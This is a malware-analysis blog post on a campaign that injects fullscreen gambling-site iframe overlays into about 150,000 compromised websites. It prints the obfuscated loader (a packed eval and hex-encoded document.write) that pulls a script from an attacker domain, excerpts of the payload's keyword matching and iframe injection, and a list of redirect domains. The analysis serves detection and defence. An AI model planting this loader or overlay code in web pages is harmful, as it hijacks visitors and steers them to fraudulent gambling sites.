In February, we uncovered a threat actor targeting over 35,000 websites with a malicious full-page hijack injection. We’ve continued to monitor this actor’s activities and have identified new tactics and techniques. They’ve scaled up their operations significantly, as we now estimate that approximately 150,000 websites have been impacted by this campaign.
What’s new in this attack?
UI/UX changes
The threat actor has slightly revamped their interface but is still relying on an iframe injection to display a full-screen overlay in the visitor’s browser. Here’s an example of one of their latest injected pages:
Even though the visuals and layout may differ, the underlying injection method remains the same at its core.
Variations on the same theme
Another variation of this attack shows similar behavior, injecting scripts and iframes that impersonate legitimate betting websites such as Bet365. In many instances, official logos and branding are reused to make the attack appear more convincing.
HTML entity encoding in the injected code
In static code, the malicious JavaScript is injected:
<script type="text/javascript" charset="utf-8" rel="nofollow" src="/@public/base.js"></script>This is an instance of HTML Entity encoding, a different way of obfuscating code. It makes the injected script less obvious at first glance. Decoding this snippet back into plain text reveals:
<script type="text/javascript" charset="utf-8" rel="nofollow" src="/@public/base.js"></script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('o["\\q\\a\\2\\e\\f\\9\\n\\0"]["\\p\\5\\6\\0\\9"](\'\\k\\1\\2\\5\\6\\3\\0 \\0\\j\\3\\9\\i\\7\\0\\9\\t\\0\\4\\8\\h\\u\\h\\1\\2\\5\\6\\3\\0\\7 \\1\\5\\2\\i\\7\\m\\0\\0\\3\\1\\s\\4\\4\\c\\c\\c\\b\\b\\b\\d\\g\\e\\6\\g\\m\\a\\n\\r\\j\\8\\d\\2\\a\\f\\4\\8\\e\\f\\3\\d\\8\\1\\7\\l\\k\\4\\1\\2\\5\\6\\3\\0\\l\');',31,31,'x74|x73|x63|x70|x2f|x72|x69|x22|x6a|x65|x6f|x66|x38|x2e|x75|x6d|x7a|x61|x3d|x79|x3c|x3e|x68|x6e|window|x77|x64|x67|x3a|x78|x76'.split('|'),0,{}))
You can decode HTML Entity-encoded text using free tools like CyberChef.
Within this attack, there’s also JavaScript that decodes itself to:
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](
'\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x38\x38\x38\x66\x66\x66\x2e\x7a\x75\x69\x7a\x68\x6f\x6e\x67\x79\x6a\x2e\x63\x6f\x6d\x2f\x6a\x75\x6d\x70\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e'
);
Which eventually writes:
<script type="text/javascript" src="hxxps://888fff.zuizhongyj[.]com/jump.js"></script>Attackers use obfuscation to hide the true nature of the script from quick scans or less sophisticated detections.
Analyzing the final JavaScript payload
Below are some critical highlights from the final script:
Keyword-based detection logic
The script defines an array of keywords related to betting, gambling, and casino brands both in English and Chinese (e.g., bet365, WilliamHill, tyc, bwin, 12bet, w88, 宝威, 太阳城).
It then checks the <title> tag of the current page against this list:
var keyWord = [
{ key: [...], id: 1 },
...
];
b = document.getElementsByTagName("title")[0].innerText;
if (b.match(new RegExp(keyWord[i].key[j], 'ig')) != null) {
a = keyWord[i].id;
c = '?id=';
...
}
Once a match is found, the script sets up an ID parameter (?id=) for use in the next stage of the redirect.
Viewport Tag enforcement
The code includes handleViewportTag(); plus a mutation observer and a setInterval call to repeatedly insert a mobile-friendly viewport:
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">This ensures the fullscreen overlay displays correctly on mobile devices.
Fullscreen overlay + iframe injection
The attacker’s script creates a <div class="lbb"> that covers the entire screen (via CSS position: fixed; z-index: 9999; ...) and injects a fullscreen <iframe>:
var web = 'https://888fff.zuizhongyj.com/' + c + a;
document.write('<iframe src="'+web+'" ... ></iframe>');Anyone visiting the compromised site sees the malicious gambling landing page instead of the legitimate page content.
Redirect destinations
We observed multiple redirect URLs during analysis, including:
hxxps://551007t[.]cc/
hxxps://t399229[.]com/
hxxps://www.wa38di[.]com:7443/other/restrictionIp?name=access-caveat
(Previously seen in other campaigns)
hxxps://W88in[.]com
hxxps://b217102[.]cc/
hxxps://g977115[.]com/
hxxps://lucky298[.]com/
Several of these sites selectively block traffic from specific regions, leading us to suspect the primary targets are Chinese-speaking users in China, Hong Kong, and the United States.
Scale of the attack: 150K websites (and counting)
By leveraging public search tools (e.g., PublicWWW), we clustered all websites that include the obfuscated script snippet. At the time of our analysis, we identified over 150,000 unique sites. You can see a live query of these infections here.
This attack demonstrates how threat actors constantly adapt, increasing their reach and using new layers of obfuscation. Client-side attacks like these are on the rise, with more and more findings every day.
If you suspect your site might be impacted, review all scripts for hidden HTML entity encoding or suspicious <iframe> injections. As always, ongoing vigilance and regular site auditing remain your best defenses against attacks like these.